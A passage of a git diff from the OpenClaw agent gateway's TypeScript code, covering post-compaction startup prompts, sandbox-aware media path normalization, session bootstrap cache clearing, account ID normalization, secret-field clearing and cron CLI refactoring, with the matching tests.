"Session Startup" sequence explicitly. When custom sections are configured, + // use generic prose — referencing a hardcoded "Session Startup" sequence + // would be misleading for deployments that use different section names. + const prose = isDefaultSections + ? "Session was just compacted. The conversation summary above is a hint, NOT a substitute for your startup sequence. " + + "Execute your Session Startup sequence now — read the required files before responding to the user." + : `Session was just compacted. The conversation summary above is a hint, NOT a substitute for your full startup sequence. ` + + `Re-read the sections injected below (${displayNames.join(", ")}) and follow your configured startup procedure before responding to the user.`; + + const sectionLabel = isDefaultSections + ? "Critical rules from AGENTS.md:" + : `Injected sections from AGENTS.md (${displayNames.join(", ")}):`; + return ( "[Post-compaction context refresh]\n\n" + - "Session was just compacted. The conversation summary above is a hint, NOT a substitute for your startup sequence. " + - "Execute your Session Startup sequence now — read the required files before responding to the user.\n\n" + - `Critical rules from AGENTS.md:\n\n${safeContent}\n\n${timeLine}` + `${prose}\n\n` + + `${sectionLabel}\n\n${safeContent}\n\n${timeLine}` ); } catch { return null; @@ -96,7 +160,11 @@ export async function readPostCompactionContext( * Skips content inside fenced code blocks. * Captures until the next heading of same or higher level, or end of string. */ -export function extractSections(content: string, sectionNames: string[]): string[] { +export function extractSections( + content: string, + sectionNames: string[], + foundNames?: string[], +): string[] { const results: string[] = []; const lines = content.split("\n"); @@ -157,6 +225,7 @@ export function extractSections(content: string, sectionNames: string[]): string if (sectionLines.length > 0) { results.push(sectionLines.join("\n").trim()); + foundNames?.push(name); } } diff --git a/src/auto-reply/reply/reply-delivery.ts b/src/auto-reply/reply/reply-delivery.ts index 78930c708f5..acf04e73a3e 100644 --- a/src/auto-reply/reply/reply-delivery.ts +++ b/src/auto-reply/reply/reply-delivery.ts @@ -65,6 +65,7 @@ export function createBlockReplyDeliveryHandler(params: { currentMessageId?: string; normalizeStreamingText: (payload: ReplyPayload) => { text?: string; skip: boolean }; applyReplyToMode: (payload: ReplyPayload) => ReplyPayload; + normalizeMediaPaths?: (payload: ReplyPayload) => Promise; typingSignals: TypingSignaler; blockStreamingEnabled: boolean; blockReplyPipeline: BlockReplyPipeline | null; @@ -101,7 +102,10 @@ export function createBlockReplyDeliveryHandler(params: { parseMode: "auto", }); - const blockPayload = params.applyReplyToMode(normalized.payload); + const mediaNormalizedPayload = params.normalizeMediaPaths + ? await params.normalizeMediaPaths(normalized.payload) + : normalized.payload; + const blockPayload = params.applyReplyToMode(mediaNormalizedPayload); const blockHasMedia = hasRenderableMedia(blockPayload); // Skip empty payloads unless they have audioAsVoice flag (need to track it). diff --git a/src/auto-reply/reply/reply-media-paths.test.ts b/src/auto-reply/reply/reply-media-paths.test.ts new file mode 100644 index 00000000000..01bb865b140 --- /dev/null +++ b/src/auto-reply/reply/reply-media-paths.test.ts @@ -0,0 +1,57 @@ +import path from "node:path"; +import { beforeEach, describe, expect, it, vi } from "vitest"; + +const ensureSandboxWorkspaceForSession = vi.hoisted(() => vi.fn()); + +vi.mock("../../agents/sandbox.js", () => ({ + ensureSandboxWorkspaceForSession, +})); + +import { createReplyMediaPathNormalizer } from "./reply-media-paths.js"; + +describe("createReplyMediaPathNormalizer", () => { + beforeEach(() => { + ensureSandboxWorkspaceForSession.mockReset().mockResolvedValue(null); + }); + + it("resolves workspace-relative media against the agent workspace", async () => { + const normalize = createReplyMediaPathNormalizer({ + cfg: {}, + sessionKey: "session-key", + workspaceDir: "/tmp/agent-workspace", + }); + + const result = await normalize({ + mediaUrls: ["./out/photo.png"], + }); + + expect(result).toMatchObject({ + mediaUrl: path.join("/tmp/agent-workspace", "out", "photo.png"), + mediaUrls: [path.join("/tmp/agent-workspace", "out", "photo.png")], + }); + }); + + it("maps sandbox-relative media back to the host sandbox workspace", async () => { + ensureSandboxWorkspaceForSession.mockResolvedValue({ + workspaceDir: "/tmp/sandboxes/session-1", + containerWorkdir: "/workspace", + }); + const normalize = createReplyMediaPathNormalizer({ + cfg: {}, + sessionKey: "session-key", + workspaceDir: "/tmp/agent-workspace", + }); + + const result = await normalize({ + mediaUrls: ["./out/photo.png", "file:///workspace/screens/final.png"], + }); + + expect(result).toMatchObject({ + mediaUrl: path.join("/tmp/sandboxes/session-1", "out", "photo.png"), + mediaUrls: [ + path.join("/tmp/sandboxes/session-1", "out", "photo.png"), + path.join("/tmp/sandboxes/session-1", "screens", "final.png"), + ], + }); + }); +}); diff --git a/src/auto-reply/reply/reply-media-paths.ts b/src/auto-reply/reply/reply-media-paths.ts new file mode 100644 index 00000000000..1c09316afad --- /dev/null +++ b/src/auto-reply/reply/reply-media-paths.ts @@ -0,0 +1,105 @@ +import { resolvePathFromInput } from "../../agents/path-policy.js"; +import { assertMediaNotDataUrl, resolveSandboxedMediaSource } from "../../agents/sandbox-paths.js"; +import { ensureSandboxWorkspaceForSession } from "../../agents/sandbox.js"; +import type { OpenClawConfig } from "../../config/config.js"; +import type { ReplyPayload } from "../types.js"; + +const HTTP_URL_RE = /^https?:\/\//i; +const FILE_URL_RE = /^file:\/\//i; +const WINDOWS_DRIVE_RE = /^[a-zA-Z]:[\\/]/; +const SCHEME_RE = /^[a-zA-Z][a-zA-Z0-9+.-]*:/; +const HAS_FILE_EXT_RE = /\.\w{1,10}$/; + +function isLikelyLocalMediaSource(media: string): boolean { + return ( + FILE_URL_RE.test(media) || + media.startsWith("/") || + media.startsWith("./") || + media.startsWith("../") || + media.startsWith("~") || + WINDOWS_DRIVE_RE.test(media) || + media.startsWith("\\\\") || + (!SCHEME_RE.test(media) && + (media.includes("/") || media.includes("\\") || HAS_FILE_EXT_RE.test(media))) + ); +} + +function getPayloadMediaList(payload: ReplyPayload): string[] { + return payload.mediaUrls?.length ? payload.mediaUrls : payload.mediaUrl ? [payload.mediaUrl] : []; +} + +export function createReplyMediaPathNormalizer(params: { + cfg: OpenClawConfig; + sessionKey?: string; + workspaceDir: string; +}): (payload: ReplyPayload) => Promise { + let sandboxRootPromise: Promise | undefined; + + const resolveSandboxRoot = async (): Promise => { + if (!sandboxRootPromise) { + sandboxRootPromise = ensureSandboxWorkspaceForSession({ + config: params.cfg, + sessionKey: params.sessionKey, + workspaceDir: params.workspaceDir, + }).then((sandbox) => sandbox?.workspaceDir); + } + return await sandboxRootPromise; + }; + + const normalizeMediaSource = async (raw: string): Promise => { + const media = raw.trim(); + if (!media) { + return media; + } + assertMediaNotDataUrl(media); + if (HTTP_URL_RE.test(media)) { + return media; + } + const sandboxRoot = await resolveSandboxRoot(); + if (sandboxRoot) { + return await resolveSandboxedMediaSource({ + media, + sandboxRoot, + }); + } + if (!isLikelyLocalMediaSource(media)) { + return media; + } + if (FILE_URL_RE.test(media)) { + return media; + } + return resolvePathFromInput(media, params.workspaceDir); + }; + + return async (payload) => { + const mediaList = getPayloadMediaList(payload); + if (mediaList.length === 0) { + return payload; + } + + const normalizedMedia: string[] = []; + const seen = new Set(); + for (const media of mediaList) { + const normalized = await normalizeMediaSource(media); + if (!normalized || seen.has(normalized)) { + continue; + } + seen.add(normalized); + normalizedMedia.push(normalized); + } + + if (normalizedMedia.length === 0) { + return { + ...payload, + mediaUrl: undefined, + mediaUrls: undefined, + }; + } + + return { + ...payload, + mediaUrl: normalizedMedia[0], + mediaUrls: normalizedMedia, + }; + }; +} diff --git a/src/auto-reply/reply/session.test.ts b/src/auto-reply/reply/session.test.ts index 58d6b893267..db0870b704a 100644 --- a/src/auto-reply/reply/session.test.ts +++ b/src/auto-reply/reply/session.test.ts @@ -2,6 +2,7 @@ import fs from "node:fs/promises"; import os from "node:os"; import path from "node:path"; import { afterAll, afterEach, beforeAll, beforeEach, describe, expect, it, vi } from "vitest"; +import * as bootstrapCache from "../../agents/bootstrap-cache.js"; import { buildModelAliasIndex } from "../../agents/model-selection.js"; import type { OpenClawConfig } from "../../config/config.js"; import type { SessionEntry } from "../../config/sessions.js"; @@ -850,11 +851,18 @@ describe("initSessionState RawBody", () => { }); describe("initSessionState reset policy", () => { + let clearBootstrapSnapshotOnSessionRolloverSpy: ReturnType; + beforeEach(() => { vi.useFakeTimers(); + clearBootstrapSnapshotOnSessionRolloverSpy = vi.spyOn( + bootstrapCache, + "clearBootstrapSnapshotOnSessionRollover", + ); }); afterEach(() => { + clearBootstrapSnapshotOnSessionRolloverSpy.mockRestore(); vi.useRealTimers(); }); @@ -881,6 +889,10 @@ describe("initSessionState reset policy", () => { expect(result.isNewSession).toBe(true); expect(result.sessionId).not.toBe(existingSessionId); + expect(clearBootstrapSnapshotOnSessionRolloverSpy).toHaveBeenCalledWith({ + sessionKey, + previousSessionId: existingSessionId, + }); }); it("treats sessions as stale before the daily reset when updated before yesterday's boundary", async () => { @@ -1057,6 +1069,10 @@ describe("initSessionState reset policy", () => { expect(result.isNewSession).toBe(false); expect(result.sessionId).toBe(existingSessionId); + expect(clearBootstrapSnapshotOnSessionRolloverSpy).toHaveBeenCalledWith({ + sessionKey, + previousSessionId: undefined, + }); }); }); diff --git a/src/auto-reply/reply/session.ts b/src/auto-reply/reply/session.ts index a0e730334e2..6db6b1708cb 100644 --- a/src/auto-reply/reply/session.ts +++ b/src/auto-reply/reply/session.ts @@ -5,6 +5,7 @@ import { parseTelegramChatIdFromTarget, } from "../../acp/conversation-id.js"; import { resolveSessionAgentId } from "../../agents/agent-scope.js"; +import { clearBootstrapSnapshotOnSessionRollover } from "../../agents/bootstrap-cache.js"; import { normalizeChatType } from "../../channels/chat-type.js"; import type { OpenClawConfig } from "../../config/config.js"; import { @@ -358,6 +359,10 @@ export async function initSessionState(params: { // and for scheduled/daily resets where the session has become stale (!freshEntry). // Without this, daily-reset transcripts are left as orphaned files on disk (#35481). const previousSessionEntry = (resetTriggered || !freshEntry) && entry ? { ...entry } : undefined; + clearBootstrapSnapshotOnSessionRollover({ + sessionKey, + previousSessionId: previousSessionEntry?.sessionId, + }); if (!isNewSession && freshEntry) { sessionId = entry.sessionId; diff --git a/src/channels/plugins/account-helpers.test.ts b/src/channels/plugins/account-helpers.test.ts index eeddae81e17..9a7a67cf652 100644 --- a/src/channels/plugins/account-helpers.test.ts +++ b/src/channels/plugins/account-helpers.test.ts @@ -1,5 +1,6 @@ import { describe, expect, it } from "vitest"; import type { OpenClawConfig } from "../../config/config.js"; +import { normalizeAccountId } from "../../routing/session-key.js"; import { createAccountListHelpers } from "./account-helpers.js"; const { listConfiguredAccountIds, listAccountIds, resolveDefaultAccountId } = @@ -52,6 +53,22 @@ describe("createAccountListHelpers", () => { }); }); + describe("with normalizeAccountId option", () => { + const normalized = createAccountListHelpers("testchannel", { normalizeAccountId }); + + it("normalizes and deduplicates configured account ids", () => { + expect( + normalized.listConfiguredAccountIds( + cfg({ + "Router D": {}, + "router-d": {}, + "Personal A": {}, + }), + ), + ).toEqual(["router-d", "personal-a"]); + }); + }); + describe("listAccountIds", () => { it('returns ["default"] for empty config', () => { expect(listAccountIds({} as OpenClawConfig)).toEqual(["default"]); diff --git a/src/channels/plugins/account-helpers.ts b/src/channels/plugins/account-helpers.ts index 1a86648ab5e..7f72b5e3c55 100644 --- a/src/channels/plugins/account-helpers.ts +++ b/src/channels/plugins/account-helpers.ts @@ -5,7 +5,10 @@ import { normalizeOptionalAccountId, } from "../../routing/session-key.js"; -export function createAccountListHelpers(channelKey: string) { +export function createAccountListHelpers( + channelKey: string, + options?: { normalizeAccountId?: (id: string) => string }, +) { function resolveConfiguredDefaultAccountId(cfg: OpenClawConfig): string | undefined { const channel = cfg.channels?.[channelKey] as Record | undefined; const preferred = normalizeOptionalAccountId( @@ -27,7 +30,12 @@ export function createAccountListHelpers(channelKey: string) { if (!accounts || typeof accounts !== "object") { return []; } - return Object.keys(accounts as Record).filter(Boolean); + const ids = Object.keys(accounts as Record).filter(Boolean); + const normalizeConfiguredAccountId = options?.normalizeAccountId; + if (!normalizeConfiguredAccountId) { + return ids; + } + return [...new Set(ids.map((id) => normalizeConfiguredAccountId(id)).filter(Boolean))]; } function listAccountIds(cfg: OpenClawConfig): string[] { diff --git a/src/channels/plugins/config-helpers.test.ts b/src/channels/plugins/config-helpers.test.ts new file mode 100644 index 00000000000..2f29b3f8ef9 --- /dev/null +++ b/src/channels/plugins/config-helpers.test.ts @@ -0,0 +1,110 @@ +import { describe, expect, it } from "vitest"; +import { clearAccountEntryFields } from "./config-helpers.js"; + +describe("clearAccountEntryFields", () => { + it("clears configured values and removes empty account entries", () => { + const result = clearAccountEntryFields({ + accounts: { + default: { + botToken: "abc123", + }, + }, + accountId: "default", + fields: ["botToken"], + }); + + expect(result).toEqual({ + nextAccounts: undefined, + changed: true, + cleared: true, + }); + }); + + it("treats empty string values as not configured by default", () => { + const result = clearAccountEntryFields({ + accounts: { + default: { + botToken: " ", + }, + }, + accountId: "default", + fields: ["botToken"], + }); + + expect(result).toEqual({ + nextAccounts: undefined, + changed: true, + cleared: false, + }); + }); + + it("can mark cleared when fields are present even if values are empty", () => { + const result = clearAccountEntryFields({ + accounts: { + default: { + tokenFile: "", + }, + }, + accountId: "default", + fields: ["tokenFile"], + markClearedOnFieldPresence: true, + }); + + expect(result).toEqual({ + nextAccounts: undefined, + changed: true, + cleared: true, + }); + }); + + it("keeps other account fields intact", () => { + const result = clearAccountEntryFields({ + accounts: { + default: { + botToken: "abc123", + name: "Primary", + }, + backup: { + botToken: "keep", + }, + }, + accountId: "default", + fields: ["botToken"], + }); + + expect(result).toEqual({ + nextAccounts: { + default: { + name: "Primary", + }, + backup: { + botToken: "keep", + }, + }, + changed: true, + cleared: true, + }); + }); + + it("returns unchanged when account entry is missing", () => { + const result = clearAccountEntryFields({ + accounts: { + default: { + botToken: "abc123", + }, + }, + accountId: "other", + fields: ["botToken"], + }); + + expect(result).toEqual({ + nextAccounts: { + default: { + botToken: "abc123", + }, + }, + changed: false, + cleared: false, + }); + }); +}); diff --git a/src/channels/plugins/config-helpers.ts b/src/channels/plugins/config-helpers.ts index ebf6f18a510..e37ea289fa8 100644 --- a/src/channels/plugins/config-helpers.ts +++ b/src/channels/plugins/config-helpers.ts @@ -6,6 +6,13 @@ type ChannelSection = { enabled?: boolean; }; +function isConfiguredSecretValue(value: unknown): boolean { + if (typeof value === "string") { + return value.trim().length > 0; + } + return Boolean(value); +} + export function setAccountEnabledInConfigSection(params: { cfg: OpenClawConfig; sectionKey: string; @@ -111,3 +118,58 @@ export function deleteAccountFromConfigSection(params: { } return nextCfg; } + +export function clearAccountEntryFields(params: { + accounts?: Record; + accountId: string; + fields: string[]; + isValueSet?: (value: unknown) => boolean; + markClearedOnFieldPresence?: boolean; +}): { + nextAccounts?: Record; + changed: boolean; + cleared: boolean; +} { + const accountKey = params.accountId || DEFAULT_ACCOUNT_ID; + const baseAccounts = + params.accounts && typeof params.accounts === "object" ? { ...params.accounts } : undefined; + if (!baseAccounts || !(accountKey in baseAccounts)) { + return { nextAccounts: baseAccounts, changed: false, cleared: false }; + } + + const entry = baseAccounts[accountKey]; + if (!entry || typeof entry !== "object") { + return { nextAccounts: baseAccounts, changed: false, cleared: false }; + } + + const nextEntry = { ...(entry as Record) }; + const hasAnyField = params.fields.some((field) => field in nextEntry); + if (!hasAnyField) { + return { nextAccounts: baseAccounts, changed: false, cleared: false }; + } + + const isValueSet = params.isValueSet ?? isConfiguredSecretValue; + let cleared = Boolean(params.markClearedOnFieldPresence); + for (const field of params.fields) { + if (!(field in nextEntry)) { + continue; + } + if (isValueSet(nextEntry[field])) { + cleared = true; + } + delete nextEntry[field]; + } + + if (Object.keys(nextEntry).length === 0) { + delete baseAccounts[accountKey]; + } else { + baseAccounts[accountKey] = nextEntry as TAccountEntry; + } + + const nextAccounts = Object.keys(baseAccounts).length > 0 ? baseAccounts : undefined; + return { + nextAccounts, + changed: true, + cleared, + }; +} diff --git a/src/channels/plugins/types.core.ts b/src/channels/plugins/types.core.ts index 6cd5173e13b..22f8e458e79 100644 --- a/src/channels/plugins/types.core.ts +++ b/src/channels/plugins/types.core.ts @@ -102,6 +102,7 @@ export type ChannelAccountSnapshot = { linked?: boolean; running?: boolean; connected?: boolean; + restartPending?: boolean; reconnectAttempts?: number; lastConnectedAt?: number | null; lastDisconnect?: diff --git a/src/cli/banner.test.ts b/src/cli/banner.test.ts index 4863bc04551..93e47a750d2 100644 --- a/src/cli/banner.test.ts +++ b/src/cli/banner.test.ts @@ -23,12 +23,12 @@ describe("formatCliBannerLine", () => { cli: { banner: { taglineMode: "off" } }, }); - const line = formatCliBannerLine("2026.3.3", { + const line = formatCliBannerLine("2026.3.7", { commit: "abc1234", richTty: false, }); - expect(line).toBe("🦞 OpenClaw 2026.3.3 (abc1234)"); + expect(line).toBe("🦞 OpenClaw 2026.3.7 (abc1234)"); }); it("uses default tagline when cli.banner.taglineMode is default", () => { @@ -36,12 +36,12 @@ describe("formatCliBannerLine", () => { cli: { banner: { taglineMode: "default" } }, }); - const line = formatCliBannerLine("2026.3.3", { + const line = formatCliBannerLine("2026.3.7", { commit: "abc1234", richTty: false, }); - expect(line).toBe("🦞 OpenClaw 2026.3.3 (abc1234) — All your chats, one OpenClaw."); + expect(line).toBe("🦞 OpenClaw 2026.3.7 (abc1234) — All your chats, one OpenClaw."); }); it("prefers explicit tagline mode over config", () => { @@ -49,12 +49,12 @@ describe("formatCliBannerLine", () => { cli: { banner: { taglineMode: "off" } }, }); - const line = formatCliBannerLine("2026.3.3", { + const line = formatCliBannerLine("2026.3.7", { commit: "abc1234", richTty: false, mode: "default", }); - expect(line).toBe("🦞 OpenClaw 2026.3.3 (abc1234) — All your chats, one OpenClaw."); + expect(line).toBe("🦞 OpenClaw 2026.3.7 (abc1234) — All your chats, one OpenClaw."); }); }); diff --git a/src/cli/command-secret-gateway.ts b/src/cli/command-secret-gateway.ts index dfbb425a49d..b1eb174a512 100644 --- a/src/cli/command-secret-gateway.ts +++ b/src/cli/command-secret-gateway.ts @@ -25,7 +25,7 @@ type ResolveCommandSecretsResult = { hadUnresolvedTargets: boolean; }; -export type CommandSecretResolutionMode = "strict" | "summary" | "operational_readonly"; +export type CommandSecretResolutionMode = "strict" | "summary" | "operational_readonly"; // pragma: allowlist secret export type CommandSecretTargetState = | "resolved_gateway" diff --git a/src/cli/cron-cli/register.cron-add.ts b/src/cli/cron-cli/register.cron-add.ts index 4316ec06c36..05025dc05e6 100644 --- a/src/cli/cron-cli/register.cron-add.ts +++ b/src/cli/cron-cli/register.cron-add.ts @@ -1,6 +1,5 @@ import type { Command } from "commander"; import type { CronJob } from "../../cron/types.js"; -import { danger } from "../../globals.js"; import { sanitizeAgentId } from "../../routing/session-key.js"; import { defaultRuntime } from "../../runtime.js"; import type { GatewayRpcOpts } from "../gateway-rpc.js"; @@ -8,9 +7,11 @@ import { addGatewayClientOptions, callGatewayFromCli } from "../gateway-rpc.js"; import { parsePositiveIntOrUndefined } from "../program/helpers.js"; import { getCronChannelOptions, + handleCronCliError, parseAt, parseCronStaggerMs, parseDurationMs, + printCronJson, printCronList, warnIfCronSchedulerDisabled, } from "./shared.js"; @@ -24,10 +25,9 @@ export function registerCronStatusCommand(cron: Command) { .action(async (opts) => { try { const res = await callGatewayFromCli("cron.status", opts, {}); - defaultRuntime.log(JSON.stringify(res, null, 2)); + printCronJson(res); } catch (err) { - defaultRuntime.error(danger(String(err))); - defaultRuntime.exit(1); + handleCronCliError(err); } }), ); @@ -46,14 +46,13 @@ export function registerCronListCommand(cron: Command) { includeDisabled: Boolean(opts.all), }); if (opts.json) { - defaultRuntime.log(JSON.stringify(res, null, 2)); + printCronJson(res); return; } const jobs = (res as { jobs?: CronJob[] } | null)?.jobs ?? []; printCronList(jobs, defaultRuntime); } catch (err) { - defaultRuntime.error(danger(String(err))); - defaultRuntime.exit(1); + handleCronCliError(err); } }), ); @@ -273,11 +272,10 @@ export function registerCronAddCommand(cron: Command) { }; const res = await callGatewayFromCli("cron.add", opts, params); - defaultRuntime.log(JSON.stringify(res, null, 2)); + printCronJson(res); await warnIfCronSchedulerDisabled(opts); } catch (err) { - defaultRuntime.error(danger(String(err))); - defaultRuntime.exit(1); + handleCronCliError(err); } }), ); diff --git a/src/cli/cron-cli/register.cron-simple.ts b/src/cli/cron-cli/register.cron-simple.ts index b1929b6384e..ae05ff1fa69 100644 --- a/src/cli/cron-cli/register.cron-simple.ts +++ b/src/cli/cron-cli/register.cron-simple.ts @@ -1,8 +1,7 @@ import type { Command } from "commander"; -import { danger } from "../../globals.js"; import { defaultRuntime } from "../../runtime.js"; import { addGatewayClientOptions, callGatewayFromCli } from "../gateway-rpc.js"; -import { warnIfCronSchedulerDisabled } from "./shared.js"; +import { handleCronCliError, printCronJson, warnIfCronSchedulerDisabled } from "./shared.js"; function registerCronToggleCommand(params: { cron: Command; @@ -21,11 +20,10 @@ function registerCronToggleCommand(params: { id, patch: { enabled: params.enabled }, }); - defaultRuntime.log(JSON.stringify(res, null, 2)); + printCronJson(res); await warnIfCronSchedulerDisabled(opts); } catch (err) { - defaultRuntime.error(danger(String(err))); - defaultRuntime.exit(1); + handleCronCliError(err); } }), ); @@ -43,10 +41,9 @@ export function registerCronSimpleCommands(cron: Command) { .action(async (id, opts) => { try { const res = await callGatewayFromCli("cron.remove", opts, { id }); - defaultRuntime.log(JSON.stringify(res, null, 2)); + printCronJson(res); } catch (err) { - defaultRuntime.error(danger(String(err))); - defaultRuntime.exit(1); + handleCronCliError(err); } }), ); @@ -79,10 +76,9 @@ export function registerCronSimpleCommands(cron: Command) { id, limit, }); - defaultRuntime.log(JSON.stringify(res, null, 2)); + printCronJson(res); } catch (err) { - defaultRuntime.error(danger(String(err))); - defaultRuntime.exit(1); + handleCronCliError(err); } }), ); @@ -102,12 +98,11 @@ export function registerCronSimpleCommands(cron: Command) { id, mode: opts.due ? "due" : "force", }); - defaultRuntime.log(JSON.stringify(res, null, 2)); + printCronJson(res); const result = res as { ok?: boolean; ran?: boolean } | undefined; defaultRuntime.exit(result?.ok && result?.ran ? 0 : 1); } catch (err) { - defaultRuntime.error(danger(String(err))); - defaultRuntime.exit(1); + handleCronCliError(err); } }), ); diff --git a/src/cli/cron-cli/shared.ts b/src/cli/cron-cli/shared.ts index 5b9290fe858..d3601b6ce40 100644 --- a/src/cli/cron-cli/shared.ts +++ b/src/cli/cron-cli/shared.ts @@ -2,6 +2,7 @@ import { listChannelPlugins } from "../../channels/plugins/index.js"; import { parseAbsoluteTimeMs } from "../../cron/parse.js"; import { resolveCronStaggerMs } from "../../cron/stagger.js"; import type { CronJob, CronSchedule } from "../../cron/types.js"; +import { danger } from "../../globals.js"; import { formatDurationHuman } from "../../infra/format-time/format-duration.ts"; import { defaultRuntime } from "../../runtime.js"; import { colorize, isRich, theme } from "../../terminal/theme.js"; @@ -11,6 +12,15 @@ import { callGatewayFromCli } from "../gateway-rpc.js"; export const getCronChannelOptions = () => ["last", ...listChannelPlugins().map((plugin) => plugin.id)].join("|"); +export function printCronJson(value: unknown) { + defaultRuntime.log(JSON.stringify(value, null, 2)); +} + +export function handleCronCliError(err: unknown) { + defaultRuntime.error(danger(String(err))); + defaultRuntime.exit(1); +} + export async function warnIfCronSchedulerDisabled(opts: GatewayRpcOpts) { try { const res = (await callGatewayFromCli("cron.status", opts, {})) as { diff --git a/src/cli/daemon-cli/install.integration.test.ts b/src/cli/daemon-cli/install.integration.test.ts index 00d60254605..bd1a00d605d 100644 --- a/src/cli/daemon-cli/install.integration.test.ts +++ b/src/cli/daemon-cli/install.integration.test.ts @@ -72,10 +72,11 @@ describe("runDaemonInstall integration", () => { runtimeLogs.length = 0; runtimeErrors.length = 0; vi.clearAllMocks(); - delete process.env.OPENCLAW_GATEWAY_TOKEN; - delete process.env.CLAWDBOT_GATEWAY_TOKEN; - delete process.env.OPENCLAW_GATEWAY_PASSWORD; - delete process.env.CLAWDBOT_GATEWAY_PASSWORD; + // Keep these defined-but-empty so dotenv won't repopulate from local .env. + process.env.OPENCLAW_GATEWAY_TOKEN = ""; + process.env.CLAWDBOT_GATEWAY_TOKEN = ""; + process.env.OPENCLAW_GATEWAY_PASSWORD = ""; + process.env.CLAWDBOT_GATEWAY_PASSWORD = ""; serviceMock.isLoaded.mockResolvedValue(false); await fs.writeFile(configPath, JSON.stringify({}, null, 2)); clearConfigCache(); diff --git a/src/cli/gateway-cli/run-loop.ts b/src/cli/gateway-cli/run-loop.ts index 361817c8cb1..c6b7d5ea21e 100644 --- a/src/cli/gateway-cli/run-loop.ts +++ b/src/cli/gateway-cli/run-loop.ts @@ -75,7 +75,9 @@ export async function runGatewayLoop(params: { `full process restart failed (${respawn.detail ?? "unknown error"}); falling back to in-process restart`, ); } else { - gatewayLog.info("restart mode: in-process restart (OPENCLAW_NO_RESPAWN)"); + gatewayLog.info( + `restart mode: in-process restart (${respawn.detail ?? "OPENCLAW_NO_RESPAWN"})`, + ); } if (hadLock && !(await reacquireLockForInProcessRestart())) { return; diff --git a/src/cli/memory-cli.test.ts b/src/cli/memory-cli.test.ts index b318ae8e62a..85e011aaf37 100644 --- a/src/cli/memory-cli.test.ts +++ b/src/cli/memory-cli.test.ts @@ -60,6 +60,8 @@ describe("memory cli", () => { return JSON.parse(String(log.mock.calls[0]?.[0] ?? "null")) as Record; } + const inactiveMemorySecretDiagnostic = "agents.defaults.memorySearch.remote.apiKey inactive"; // pragma: allowlist secret + function expectCliSync(sync: ReturnType) { expect(sync).toHaveBeenCalledWith( expect.objectContaining({ reason: "cli", force: false, progress: expect.any(Function) }), @@ -85,6 +87,25 @@ describe("memory cli", () => { getMemorySearchManager.mockResolvedValueOnce({ manager }); } + function setupMemoryStatusWithInactiveSecretDiagnostics(close: ReturnType) { + resolveCommandSecretRefsViaGateway.mockResolvedValueOnce({ + resolvedConfig: {}, + diagnostics: [inactiveMemorySecretDiagnostic] as string[], + }); + mockManager({ + probeVectorAvailability: vi.fn(async () => true), + status: () => makeMemoryStatus({ workspaceDir: undefined }), + close, + }); + } + + function hasLoggedInactiveSecretDiagnostic(spy: ReturnType) { + return spy.mock.calls.some( + (call: unknown[]) => + typeof call[0] === "string" && call[0].includes(inactiveMemorySecretDiagnostic), + ); + } + async function runMemoryCli(args: string[]) { const program = new Command(); program.name("test"); @@ -191,26 +212,12 @@ describe("memory cli", () => { it("logs gateway secret diagnostics for non-json status output", async () => { const close = vi.fn(async () => {}); - resolveCommandSecretRefsViaGateway.mockResolvedValueOnce({ - resolvedConfig: {}, - diagnostics: ["agents.defaults.memorySearch.remote.apiKey inactive"] as string[], - }); - mockManager({ - probeVectorAvailability: vi.fn(async () => true), - status: () => makeMemoryStatus({ workspaceDir: undefined }), - close, - }); + setupMemoryStatusWithInactiveSecretDiagnostics(close); const log = spyRuntimeLogs(); await runMemoryCli(["status"]); - expect( - log.mock.calls.some( - (call) => - typeof call[0] === "string" && - call[0].includes("agents.defaults.memorySearch.remote.apiKey inactive"), - ), - ).toBe(true); + expect(hasLoggedInactiveSecretDiagnostic(log)).toBe(true); }); it("prints vector error when unavailable", async () => { @@ -410,15 +417,7 @@ describe("memory cli", () => { it("routes gateway secret diagnostics to stderr for json status output", async () => { const close = vi.fn(async () => {}); - resolveCommandSecretRefsViaGateway.mockResolvedValueOnce({ - resolvedConfig: {}, - diagnostics: ["agents.defaults.memorySearch.remote.apiKey inactive"] as string[], - }); - mockManager({ - probeVectorAvailability: vi.fn(async () => true), - status: () => makeMemoryStatus({ workspaceDir: undefined }), - close, - }); + setupMemoryStatusWithInactiveSecretDiagnostics(close); const log = spyRuntimeLogs(); const error = spyRuntimeErrors(); @@ -426,13 +425,7 @@ describe("memory cli", () => { const payload = firstLoggedJson(log); expect(Array.isArray(payload)).toBe(true); - expect( - error.mock.calls.some( - (call) => - typeof call[0] === "string" && - call[0].includes("agents.defaults.memorySearch.remote.apiKey inactive"), - ), - ).toBe(true); + expect(hasLoggedInactiveSecretDiagnostic(error)).toBe(true); }); it("logs default message when memory manager is missing", async () => { diff --git a/src/cli/nodes-cli/register.invoke.ts b/src/cli/nodes-cli/register.invoke.ts index d23d35c9f21..fc0493734f9 100644 --- a/src/cli/nodes-cli/register.invoke.ts +++ b/src/cli/nodes-cli/register.invoke.ts @@ -9,6 +9,8 @@ import { type ExecSecurity, maxAsk, minSecurity, + normalizeExecAsk, + normalizeExecSecurity, resolveExecApprovalsFromFile, } from "../../infra/exec-approvals.js"; import { buildNodeShellCommand } from "../../infra/node-shell.js"; @@ -43,22 +45,6 @@ type ExecDefaults = { safeBins?: string[]; }; -function normalizeExecSecurity(value?: string | null): ExecSecurity | null { - const normalized = value?.trim().toLowerCase(); - if (normalized === "deny" || normalized === "allowlist" || normalized === "full") { - return normalized; - } - return null; -} - -function normalizeExecAsk(value?: string | null): ExecAsk | null { - const normalized = value?.trim().toLowerCase(); - if (normalized === "off" || normalized === "on-miss" || normalized === "always") { - return normalized as ExecAsk; - } - return null; -} - function resolveExecDefaults( cfg: ReturnType, agentId: string | undefined, diff --git a/src/cli/qr-cli.test.ts b/src/cli/qr-cli.test.ts index 97e5c1c01a7..92b4af93e2f 100644 --- a/src/cli/qr-cli.test.ts +++ b/src/cli/qr-cli.test.ts @@ -72,6 +72,32 @@ function createTailscaleRemoteRefConfig() { }; } +function createDefaultSecretProvider() { + return { + providers: { + default: { source: "env" as const }, + }, + }; +} + +function createLocalGatewayConfigWithAuth(auth: Record) { + return { + secrets: createDefaultSecretProvider(), + gateway: { + bind: "custom", + customBindHost: "gateway.local", + auth, + }, + }; +} + +function createLocalGatewayPasswordRefAuth(secretId: string) { + return { + mode: "password", + password: { source: "env", provider: "default", id: secretId }, + }; +} + describe("registerQrCli", () => { function createProgram() { const program = new Command(); @@ -88,6 +114,23 @@ describe("registerQrCli", () => { await expect(runQr(args)).rejects.toThrow("exit"); } + function parseLastLoggedQrJson() { + return JSON.parse(String(runtime.log.mock.calls.at(-1)?.[0] ?? "{}")) as { + setupCode?: string; + gatewayUrl?: string; 